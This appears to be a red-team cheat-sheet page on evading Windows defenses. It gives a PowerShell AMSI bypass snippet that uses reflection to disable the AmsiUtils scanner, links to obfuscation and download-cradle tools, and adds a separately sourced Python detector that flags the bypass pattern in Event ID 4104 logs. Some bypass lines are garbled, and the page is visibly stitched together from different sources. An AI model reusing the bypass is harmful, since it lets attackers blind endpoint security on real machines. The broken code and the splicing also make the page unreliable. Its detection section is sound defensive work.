Disable/Evade Defenses

AMSI Bypass


$a =[Ref].Assembly.GetType('System.Management.Automation.Ams' + 'iUtils')
$h="4456625220575263174452554847"
$s =string-replace " "
$b =$a.GetField($s,'NonPublic,Static')
$b.SetValue($null,$true)

https://github.com/danielbohannon/Invoke-Obfuscation

https://github.com/danielbohannon/Invoke-CradleCrafter

Invoke-CradleCrafter exists to aid Blue Teams and Red Teams in easily exploring, generating and obfuscating PowerShell remote download cradles. In addition, it helps Blue Teams test the effectiveness of detections that may work for output produced by Invoke-Obfuscation but may fall short when dealing with Invoke-CradleCrafter since it does not contain any string concatenations, encodings, tick marks, type casting, etc.
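For the Blue Team side, the following added example (not from this page or from the linked projects) checks script block text for the reflection pattern in the AMSI snippet above: a literal search for the type name misses the concatenated string, so the text is normalized first and the reflection chain itself is also matched. It assumes PowerShell Script Block Logging (Event ID 4104) text has already been exported as strings; the sample strings, indicator names and function names are all constructed for illustration.

```python
import re

# Constructed script block texts, as they might appear in Event ID 4104 records.
SAMPLES = {
    "page_pattern": "$a =[Ref].Assembly.GetType('System.Management.Automation.Ams' + 'iUtils'); "
                    "$b = $a.GetField($s,'NonPublic,Static'); $b.SetValue($null,$true)",
    "hidden_type_name": "$a=[Ref].Assembly.GetType($t); "
                        "$a.GetField($f,'NonPublic,Static').SetValue($null,$true)",
    "benign_reflection": "[Ref].Assembly.GetType('System.Management.Automation.PSObject').FullName",
    "benign_admin": "Get-ChildItem C:\\Logs | Where-Object Length -gt 1MB",
}

# Quote, plus sign, quote: the join in 'Ams' + 'iUtils'.
CONCAT = re.compile(r"""['"]\s*\+\s*['"]""")

# Hypothetical indicator names; patterns run on normalized, lowercased text.
INDICATORS = {
    "amsiutils_type": re.compile(r"system\.management\.automation\.amsiutils"),
    "reflective_gettype": re.compile(r"\.assembly\.gettype\s*\("),
    "nonpublic_static_field": re.compile(r"getfield\s*\([^)]*nonpublic\s*,\s*static"),
    "field_setvalue": re.compile(r"\.setvalue\s*\(\s*\$null\s*,"),
}
# Behaviour chain that stays visible even when the type name never appears as text.
CHAIN = {"reflective_gettype", "nonpublic_static_field", "field_setvalue"}

def naive_match(script: str) -> bool:
    """Literal keyword search, the kind of rule string concatenation defeats."""
    return "amsiutils" in script.lower()

def normalize(script: str) -> str:
    """Drop tick marks and collapse quoted-string concatenation, then lowercase."""
    return CONCAT.sub("", script.replace("`", "")).lower()

def assess(script: str) -> dict:
    """Return the indicators hit and whether the block deserves an alert."""
    text = normalize(script)
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    suspicious = "amsiutils_type" in hits or CHAIN <= set(hits)
    return {"hits": hits, "suspicious": suspicious}

if __name__ == "__main__":
    for name, script in SAMPLES.items():
        print(f"{name}: naive={naive_match(script)} assess={assess(script)}")
```

The normalization only undoes tick marks and quote concatenation; the chain rule is what still fires when the type name is supplied some other way, and it is also the part most likely to need allow-listing for legitimate reflection-heavy scripts.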

https://www.youtube.com/watch?v=Nn9yJjFGXU0

Blocked PowerShell.exe